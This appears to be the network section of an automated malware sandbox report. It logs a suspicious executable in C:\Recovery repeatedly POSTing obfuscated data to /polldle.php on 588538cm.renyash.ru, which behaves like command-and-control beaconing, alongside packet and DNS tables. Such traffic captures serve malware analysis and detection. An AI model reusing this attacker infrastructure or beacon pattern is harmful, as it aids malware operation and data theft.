                                                                                Jan 11, 2025 23:34:21.009954929 CET8050120104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.097393036 CET8050120104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.145423889 CET5012080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.372791052 CET8050120104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.426772118 CET5012080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.509576082 CET5012080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.510205030 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.515052080 CET8050120104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.515125990 CET5012080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.515528917 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.515626907 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.515712976 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.520638943 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.864425898 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:21.869409084 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.869441986 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.869468927 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:21.959522009 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.004996061 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.203393936 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.254868984 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.372252941 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.373534918 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.377445936 CET8050121104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.377513885 CET5012180192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.378467083 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.378570080 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.378753901 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.391122103 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.723790884 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.754982948 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:22.814697027 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.814733982 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.814881086 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.814910889 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.833591938 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:22.880019903 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.054723978 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.098624945 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.177010059 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.177690029 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.182112932 CET8050122104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.182204008 CET5012280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.182512999 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.182605028 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.182759047 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.187568903 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.536339045 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.541358948 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.541388035 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.541414976 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.636280060 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.676762104 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.787436008 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.787761927 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.792318106 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.792407990 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.792531967 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.792828083 CET8050123104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.792892933 CET5012380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.797311068 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.986314058 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.991257906 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:23.991360903 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.991456985 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:23.996340036 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.145536900 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.150583982 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.150731087 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.236550093 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.286046982 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.349858999 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.354841948 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.354871035 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.354897976 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.436311007 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.445517063 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.489265919 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.489267111 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.683984995 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.739259005 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.772527933 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.817303896 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.897706985 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.897710085 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.898365974 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.903601885 CET8050125104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.903712988 CET8050124104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.903744936 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:24.903790951 CET5012580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.903804064 CET5012480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.903857946 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.903994083 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:24.909372091 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.255024910 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.259949923 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.259985924 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.260014057 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.375793934 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.426846981 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.617631912 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.661251068 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.740351915 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.741072893 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.745568037 CET8050126104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.745639086 CET5012680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.745930910 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:25.746011019 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.746139050 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:25.750963926 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.098711967 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.103754044 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.103787899 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.103817940 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.209597111 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.254884958 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.455501080 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.504810095 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.588397026 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.589190960 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.594001055 CET8050127104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.594110012 CET5012780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.594675064 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.594784021 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.594919920 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.600307941 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.942418098 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:26.947609901 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.947747946 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:26.947777033 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:27.042316914 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:27.082931995 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:27.280797005 CET8050128104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:27.332946062 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:27.488471985 CET5012880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:27.488909960 CET5012980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.434056997 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.439258099 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.786257982 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:38.791388035 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.791419983 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.791446924 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:38.879250050 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.004904985 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:39.036425114 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.114191055 CET5014580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:34:39.123140097 CET8050145104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:34:39.230523109 CET5014580192.168.2.4104.21.38.84
                                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Jan 11, 2025 23:32:50.999866009 CET | 54988 | 53 | 192.168.2.4 | 1.1.1.1
                                                                                Jan 11, 2025 23:32:51.011538982 CET | 53 | 54988 | 1.1.1.1 | 192.168.2.4
                                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                Jan 11, 2025 23:32:50.999866009 CET | 192.168.2.4 | 1.1.1.1 | 0x48e6 | Standard query (0) | 588538cm.renyash.ru | A (IP address) | IN (0x0001) | false
                                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                Jan 11, 2025 23:32:51.011538982 CET | 1.1.1.1 | 192.168.2.4 | 0x48e6 | No error (0) | 588538cm.renyash.ru | | 104.21.38.84 | A (IP address) | IN (0x0001) | false
                                                                                Jan 11, 2025 23:32:51.011538982 CET | 1.1.1.1 | 192.168.2.4 | 0x48e6 | No error (0) | 588538cm.renyash.ru | | 172.67.220.198 | A (IP address) | IN (0x0001) | false
                                                                                • 588538cm.renyash.ru
                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                0 | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:51.067539930 CET | 318 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 344
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:51.510669947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:51.762320995 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfYCqex7LtEtvNaUqMQCrelPcpHm%2FKOdrJO1NPi7Bdc%2FPfP8dSQhKbeGnxeQDFaumqVU4MOoxauV%2FXLxDr4nwu6XBVX190bUYrNp%2BzN1Do1D8K%2Fv5crevHd%2BCcxiUEU2FTlbelLH"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d79a9f7c34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2643&min_rtt=1564&rtt_var=2745&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=662&delivery_rate=143123&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:32:51.808798075 CET | 294 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 384
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:51.902576923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:52.143965960 CET | 964 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=699vq%2BN8NgHBq%2BPHdIHjpGzJULsPZIaSVGBPOtQHB16L8oQoC4WQAv%2FAWHR%2BjdEK60EhWGvaGFb4SxZ%2BeXai2r6xFViAqdNG5XGjYGliHP%2FrTVE1G0rPpMPeamCwNPuLiXJa1cAu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7c2d1ec34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4768&min_rtt=1564&rtt_var=6230&sent=9&recv=10&lost=0&retrans=0&sent_bytes=2164&recv_bytes=1340&delivery_rate=2660996&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:32:52.295711994 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:52.389503956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:52.681299925 CET | 961 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60yL%2BUhVO8di5M2ZtH%2Fp%2ByX0YU3DbQEbDRyXMcJT2p0BXXLy3iUCnhCZAvuKuvHTPkUQF8yhi8PIcedPKmOfdpD3PfxI0vMrzwvnaORNxfd6KUS8mkKKYwWlQEFmQCir%2FjWjopcF"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7f28b3c34f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6077&min_rtt=1513&rtt_var=7500&sent=15&recv=16&lost=0&retrans=0&sent_bytes=3153&recv_bytes=3251&delivery_rate=2660996&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.2.4 | 49737 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:51.962318897 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:52.434441090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:52.672867060 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFikO1q27IZU%2BngDbRD8AlWoekDxkR69%2BWGmMQhjNDAVCDVY6nsOZyHAKWjZ%2FcLN2mb5PFlMHguKYP%2F%2F0TRqEJYCcotZVIBCiMiFZzh%2Fi70Q07xX00ZaLYIxXDO9DwtKwBlRRUfw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d7f6e565e86-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6603&min_rtt=1639&rtt_var=10543&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=35304&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.4 | 49738 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:52.881068945 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:32:53.340876102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:53.554296970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:53.571986914 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s0DrOxA6FUTRW3AXwpBpRzq8n%2BWHMIBNiesGTTOb1DDhcTKMeZwYjABD120S%2BuFpLPAP0i80oeOcVmIynFlpQEQqQiKrFxi0zU6NPeBJE5fhzsUNPllAlniMm7SKtf2Vto6VtsAY"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d851bd0ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8589&min_rtt=2017&rtt_var=13900&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=26742&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                3 | 192.168.2.4 | 49739 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:53.839603901 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:54.284044981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:54.554116011 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qla73u07NXXAywahUUmtNvgf75ZPE7dsNuvDbFQfBaN3iHPcdNcv85PidtW1xJZQ1rdlOcI7lZOMvZFMoBreykyFIGNswyuaUSz7Y4rSCWUsCLA55ohZgG6RCuATPhWghqDK6917"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d8b099b0ca0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1747&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=755693&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.2.4 | 49740 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:54.889626980 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:55.239274979 CET | 2504 | OUT | Data Raw: 58 5c 54 56 5a 42 5a 58 54 5d 55 5a 50 55 59 5f 50 55 5a 5d 57 57 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TVZBZXT]UZPUY_PUZ]WWPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@.0918X19%,27?5;<(<3102,78^!(%#X'/\/
                                                                                Jan 11, 2025 23:32:55.333323002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:55.582978010 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
